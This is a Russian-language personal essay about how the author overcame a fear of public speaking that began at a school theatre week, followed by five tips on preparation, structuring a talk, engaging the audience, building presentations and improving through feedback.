Источник: https://englishpapa.ru/5sovetovpovystupliniyu/

Как я научился выступать публично. 5 советов для стеснительных людей

Увы, я поздно открыл для себя необходимость тренировки навыка публичных выступлений. Вернее, не так. Я поздно понял, что его надо тренировать и что это полезная в плане карьеры и личностного развития штука.

То есть умом я всё понимал, видел много людей, которые постепенно становились уважаемыми экспертами. Дело в том, что мы все с вами можем быть уважаемыми экспертами. Каждому из нас есть чем поделиться с окружающими.

Но делают это единицы, хотя многие понимают, что тоже смогут и, вероятно, лучше других. Думаю, что дело в страхе. По крайней мере, в моём случае. Я всегда боялся выступать, до тряски в руках. Мне казалось, что я не просто неинтересен или скучен, но и смешон.

Да, в этом всё дело. Я боялся, что меня осмеют, негативно оценят. Этот страх негативной оценки появился ещё в школе. 

У меня была прекрасная школа, с сильными гуманитарными традициями. Раз, а иногда и два раза в год в ней проходила так называемая «Неделя театра детям». Все классы готовили театральные представления и в течение недели демонстрировали постановки всей школе.

На пятом этаже был уютный актовый зал, который вмещал если не все классы, то большую их часть. Участие в постановке было условно-обязательным. То есть каждый должен был что-то сделать, как-то помочь общему делу.

Конечно, было соревнование за главные роли, у нас в классе было поразительно много ярких личностей. А я всегда отлынивал, для меня мечтой было посидеть за звуковым пультом. Один раз я вышел объявлять постановку, и до сих пор, через 25 лет, я помню этот ужас.

Яркий свет в глаза от рампы, заученный текст и мой дрожащий голос. Мне казалось, что надо мной смеётся вся школа. Конечно, они даже не заметили тот мой выход.

Натурально, любые виды выступлений вызывали страх. Особенно если они были в незнакомой или непривычной обстановке.

И если выход к доске в школе был более-менее предсказуем, то, например, необходимость сказать тост на юбилее руководителя влекла за собой длительную и серьёзную работу с собой.

В результате тосты получались краткими и ёмкими, что неплохо, но нервов было потрачено изрядно. Как вы понимаете, кроме застолий было много ситуаций, которые требовали выступлений. Совещания всех мастей, конференции, я уже не говорю про СМИ.

Всё это вызывало страх, и я бежал от этого страха. Умом понимая, что полезно, очень полезно для собственной карьеры хорошо представить высшему руководству результаты своей работы. Но страх заставлял меня «делегировать» эту обязанность более коммуникабельным коллегам.

Как говорится в одной поговорке, немного антизоологичной: «Мало яйца нести, надо ещё и уметь кукарекать». Наш мир в этом смысле прост: твой результат должен быть правильно упакован и правильно и вовремя подан. Подан в той форме, которая общепринята и всем привычна.

Выступление с презентацией? Доклад с трибуны? Участие в дискуссии? Все эти формы имеют свои правила, свою, иногда неписаную последовательность действий. Ты можешь её улучшить в определённых рамках. Ты можешь, например, добавить энергии и страсти своему выступлению.

Или ты можешь пошутить в некоторых границах. Или надеть красный галстук для привлечения внимания. Но ты должен выступать и уметь «кукарекать», чтобы развивать свои замыслы и идеи. Это просто часть работы того, кто продвигает так или иначе сложные, комплексные идеи.

Надо сказать, что до определённого уровня все эти публичные выступления не нужны. Есть же очевидные области деятельности, очевидные проекты и задачи. Чем более они понятны окружающим, чем более точно и привычно они могут оценить результат или эффект, тем меньше нужны выступления, тем меньше нужны коммуникации вообще.

Мы ведь не проводим митинг-накачку со своими домашними перед походом в магазин? Конечно, нет, мы все понимаем, что будем делать, принимаем наши роли и осознаём, как нам оценить успешность предприятия. Но вряд ли мы сможем создать, например, новую школу молча. Нам определённо понадобятся не просто сотрудники, но союзники.

И нам совершенно точно надо будет убеждать тех, кто потратит на это деньги.

Мы можем сократить время на убеждение других, если будем считаться экспертами.

Знаете ведь, что можно долго приводить примеры, расчёты, ссылаясь на опыт других, а можно просто сказать «я так считаю»? Когда тебя воспринимают как знатока, как всеми признанного умельца в какой-то сфере, жизнь становится проще. Но это признание имеет и свою цену.

Мало того что тебе придётся перебороть свой страх, тебе придётся научиться выступать в разных форматах и даже в разных состояниях, тебе ещё придётся инвестировать своё время в поддержание признания своей экспертности.

Тут есть опасность, описание которой достойно отдельной статьи, — это риск стать исключительно «тусовщиком», человеком, который везде и всюду выступает ради самих выступлений. Страшная вещь. И важно, погружаясь в волшебный мир публичных выступлений, выдерживать баланс содержательного и «бантиков». Баланс несения яиц и кукареканья.

И всё же кукарекать надо, надеюсь, это стало для всех очевидным. Поняв это достаточно рано, я всё никак не мог принять это эмоционально. Побороть свой страх, перестать ожидать негативную оценку окружающих.

Возникла любопытная ситуация: мои амбиции гнали меня вперёд, к более крупным проектам и командам, а мой страх не давал возможности даже попробовать делать что-то большее. Раздражение, даже агрессия от этого конфликта породила простую мысль: надо брать и делать.

Фактически, если нет других способов, то надо просто идти и выступать. Неважно где, может, неважно, с какой темой. Надо нарабатывать опыт и двигаться. Иначе этот страх не побороть, иначе так всю жизнь и буду сожалеть об упущенных возможностях.

И я начал себя заставлять, тащить из болота, как тот барон Мюнхгаузен вытаскивал себя за волосы.

Мне понадобился примерно год. После первых 2–3 конференций руки и голос уже не дрожали так, что это было видно и слышно людям дальше третьего ряда. После первого десятка выступлений я открыл для себя структуру выступления, что сильно упростило дальнейшую жизнь. Параллельно у меня было несколько тренингов по разным аспектам выступлений.

Хочу сказать, что практически бессмысленно учиться выступать, не имея решимости и плана выступлений. Когда преодолеваешь себя, то эти тренинги становятся действительно полезными. Опыт выступлений в зале на 1000 человек, опыт прямого эфира на телевидении и радио полезно завершил мой годовой марафон.

Мне сложно судить, стал ли я хорошим спикером, но то, что этот опыт позитивно повлиял на мою жизнь, сделал её более полной, — точно.

Я бы хотел дать несколько советов. Если вы думаете о том, чтобы начать выступать, или вам не нравится частота и уровень ваших выступлений, или вы просто ищете новое, — посмотрите, они могут вам помочь. Итак:

  1. Готовьтесь. Как бы вы ни были уверены в себе. Как бы вы много ни выступали. Как бы вы хорошо ни знали тему. Готовьтесь всегда. Я тратил от часа до трёх дней на подготовку к выступлениям. И всегда это было обосновано. Напротив, когда я не готовился, то всегда, в 10 случаях из 10, у меня был провал. Помните, что лучший экспромт — это экспромт подготовленный.
  2. Разрабатывайте план выступления по трём точкам. Помните, как учили на уроке литературы? Завязка, кульминация, развязка. Вот всё то же самое. Разрабатывайте план с развязки. Что вы хотите сказать, что именно, какая у вас цель? Дальше формулируйте кульминацию, это ваша доказательная база. Как и чем вы убедите слушателей, что лежит в основе ваших тезисов? И завязка, возможно, самая важная часть выступления. Как вы заинтересуете тех, кто в зале? Почему они должны остаться, а не уйти?
  3. Будьте контрастны. Как ни ужасно это прозвучит, но большинство спикеров достаточно скучны. Они читают текст по бумажке, или переваривают одну мысль десять минут, или вообще не общаются с залом. Будьте другим. Шутите (предварительно подготовив шутки), рассказывайте случаи из жизни (предварительно вычистив их от упоминаний конкретных людей), задавайте вопросы и интересуйтесь вашими слушателями. Мой самый удачный опыт был таким: на очень формальном выступлении в одном из вузов, где за длинным столом восседали важные люди, я, общаясь со студентами, спустился на ступеньки между сценой и залом. Я сел на ступеньки, мои глаза стали на уровне глаз моей аудитории, и мы начали разговаривать. Контраст был поразительный.
  4. Делайте правильные презентации. Я открою секрет: презентация не для того, чтобы по ней читать. Она — чтобы заинтересовывать, чтобы вызывать любопытство. Я знаю массу примеров, когда очень хороший доклад, очень хорошее выступление было убито негодной презентацией. Вы же не приходите на совещание к руководству в тренировочных штанах? Так почему же вы приходите с текстом на странице и называете это презентацией? В этом смысле лучше выступать совсем без неё. Внимание ваших слушателей — вот за что вы должны бороться. И очень, очень важно, чтобы оно целиком и полностью досталось вам и вашим тезисам.
  5. Улучшайте свои выступления. Обычно я считаю критерием качества моих выступлений количество задаваемых мне вопросов. Логика здесь следующая: цель любого выступления — заинтересовать, заинтересованные люди задают вопросы. Всё просто. Если вопросов нет — вы определённо провалились. Попросите организаторов выступлений собирать обратную связь. Будет здорово, если на мероприятии слушатели голосуют и строится рейтинг выступавших. Смотрите видео своих выступлений. И обязательно посетите несколько тренингов. Я уверен, что при системном подходе к улучшению выступлений любой, абсолютно любой человек будет очень прилично выступать. Это небольшая наука, это может каждый.

Источник: https://life.ru/965421

Ссылка на основную публикацию
Adblock
detector